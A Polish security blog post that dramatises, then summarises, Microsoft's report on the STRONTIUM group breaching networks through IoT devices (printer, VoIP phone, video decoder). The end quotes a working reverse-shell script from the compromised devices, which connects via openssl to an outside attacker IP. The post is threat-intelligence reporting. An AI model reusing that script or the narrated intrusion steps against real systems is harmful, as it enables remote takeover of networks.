-15% na nową książkę sekuraka: Wprowadzenie do bezpieczeństwa IT. Przy zamówieniu podaj kod: 10000

Siergiej ruszaj dupę!!! Kliknęli w linka, wbijaj się bistro na tę drukarkę i jedziemy dalej!

06 sierpnia 2019, 16:20 | W biegu | komentarzy 5
Tagi: , ,

Bajkał

Zapowiadał się kolejny spokojny wieczór. Mały pokój w jednym z moskiewskich biur, z porozwalanymi pudełkami po pizzy i rozrzuconymi niemal wszędzie butelkami po wyśmienitym napoju Bajkał.

– Te Wowa, widziałeś te nowe dumpy 0-dayów na IoT z chińskich forów? Centrala podrzuciła dzisiaj na to namiary.
– No… widziałem. TP-Linki,  routerki ASUS-a, masa kamer, drukarki, nagrywarki wideo, nawet jakieś exploiciki na zabawki. Chinole się nie pierdzielą tylko udostępniają tego na potęgę. Pełne exploity a nie jakieś PoC-e. Aż dziw bierze, że te łośki zza oceanu jeszcze niczego z tym nie zrobili. Coś tam próbowali wprowadzać ustawy czy coś ale się rozeszło hehehe. Ustawą wymóc bezpieczeństwo? buahahaha spuentował śmiechem Wowa.
– No to są jaja, co my tu mamy… zahardkodowane backdoorowe konta, o a tu port debug gdzie można dostać się na roocika. Serial z dostępem na roota bez hasła. E, to słabe bo trzeba mieć fizyczny dostęp. O, a tu wydobyli kluczyk krypto z EEPROMA, haha. Gulp, gulp, Siergiej przepił smakowite exploitowe kąski Bajkałem.
– Hej! Patrz co się dzieje! Kliknęli!
– Co?
Butelka Siergieja poleciała na klawiaturę.
– Co ty wyrabiasz! Wszystko w tym słodkim syfie. Zapylaj po backup a ja jadę! Wykrzyknął Wowa.

Tydzień wcześniej grupa STRONT dostała z reconu trochę informacji o wewnętrznej adresacji jednego z amerykańskich szpitali realizujących program badawczy. Ponoć dla wojska; z pewnością warto sprawdzić ten wątek.

Hmm dobra nasza poszedł jeden CSRF na jedną z ich drukarek  – pomyślał Wowa. Taaa domyślne hasełka. Dobra wbijam.
– Sieeeeergieeej ruszaj dupę. Dawaj tego exploita na drukarki HP. Mam tam webowego admina, ale  chcę mieć  roota!!!
– Yyyhhhaahhh, noo… Już.

[ 10 minut później ]
– Jesteśmy. Cholera kernel 2.4, łooo zrzucaj pamięć i konfiga ile się da. Ja skanuję sieć.
– Dawaj na początek tcpdumpa, zostawi mniej śladu. Łap statyczną binarkę.
– Dzięki, puszczam. C&C gotowe?
– Chwila… dawaj, gotowe. Pamiętaj żeby przepuścić to zaszyfrowane.
– Leci.

[ 5 minut później ]
– Co tam mamy? Domyślne community stringi, trochę XP-ków, oooo niezabezpieczony OSPF. Dawaj skrypty scapy, spróbuję sprawdzić czy da się wstrzyknąć parę pakietów żeby przekonfigurować tablicę routingu. Poszukasz jakiejś maszyny przez, którą przepuścimy ruch? Ta drukarka może nam kipnąć jak zalejemy ją ruchem zebranym z całej sieci!
– Dobra, obadam te XP-ki. Jak mają RDP to może zadziała Bluekeep. Tydzień temu przejęliśmy tym pół sieci, centrala ma łepskich gości, exploit działa jak złoto!

[ 30 minut później ]

– Cholera, prawie zero zabezpieczeń, jak oni o robią? Mamy puszczony ruch przez tego XP-ka. To jakiś system do obróbki zdjęć rentgenowskich, chyba nie dali do tej maszyny nowszych drajwerów niż do XP-ka.
– Ile mamy maszynek?
– Kilka telefonów, rekorder wideo, dwie drukarki, parę Windowsów.
– Wszystko w jednej podsieci czy w osobnych?
– No tu jest tylko jedna sieć, łamago!
– Dobra, bierzmy na cel tego hosta med-arpa-data. Coś tam mamy?
– Wszystko popatchowane, dostępne tylko dwa porty – 80, 443. Dupa.
– Jaka dupa? Dawaj delikatnie ettercapa, ja włączam tcpdumpa i zobaczymy.

[ godzinę później ]

– Łooooosz, na arpa-data zalogował się admin.
– http / https?

Mina Siergieja popijającego z ukontentowaniem szklaneczkę Bajkału mówiła wszystko.

– Noevilshallpass!
– Hehe, nie wierzę, http!?
– Skup się, mamy admina, dumpujemy dane, czyścimy i znikamy
– Czyścimy? może coś sobie zostawmy…?

***

To lekko podkolorowana historia, którą właśnie opisuje ekipa Microsoft Threat Intelligence Center. Tym razem na wrogich działaniach przyłapana została grupa o kodowej nazwie STRONT, mapowana na jedną z rosyjskich jednostek APT:

 80% of STRONTIUM attacks have largely targeted organizations in the following sectors: government, IT, military, defense, medicine, education, and engineering. We have also observed and notified STRONTIUM attacks against Olympic organizing committees, anti-doping agencies, and the hospitality industry.

Co dokładniej się stało? Więcej macie w tekście powyżej ;-) A Microsoft relacjonuje to w ten sposób, kładąc szczególny nacisk na wykorzystanie problemów w podatnych urządzeniach IoT:

(…) research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device.

I dalej:

These devices became points of ingress from which the actor established a presence on the network and continued looking for further access. Once the actor had successfully established access to the network, a simple network scan to look for other insecure devices allowed them to discover and move across the network in search of higher-privileged accounts that would grant access to higher-value data.  After gaining access to each of the IoT devices, the actor ran tcpdump to sniff network traffic on local subnets.

Na deser jeszcze jeden ze skryptów zlokalizowanych na zaatakowanych urządzeniach IoT:

—contents of [IOT Device] file--

#!/bin/sh
export [IOT Device] ="-qws -display :1 -nomouse"
echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host 167.114.153.55 -port 443 |while : ; do sh && break; done| openssl s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 && cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ]; then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &

--end contents of file--

–Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. zero one

    Historyjka nie kiepska :-D
    Choć najbardziej zastanawia mnie ten „Bajkał”. Nigdy nie piłem. :-P
    Dobre to?

    Odpowiedz
  2. „S” in „IoT” is for Security ;)

    Odpowiedz
  3. Tomasz21

    Witam; Kapitalny wpis. Można się ubawić, i posikać ze śmiechu. Przekornie powiedziałbym , czysta rzeczywistość. Taka, tragi-farsa. Ale realnie wygląda, powiedziałbym, bardzo realnie.
    Pozdrawiam. Wszystkiego dobrego.

    Odpowiedz
  4. Stenly

    Historyjka fajna, tylko gdzie puenta ?

    Odpowiedz
  5. Michał

    Przypomniał mi się Sergey Taraspov, który kreatywnie wykorzystał VBScript ;)

    Odpowiedz

Odpowiedz na zero one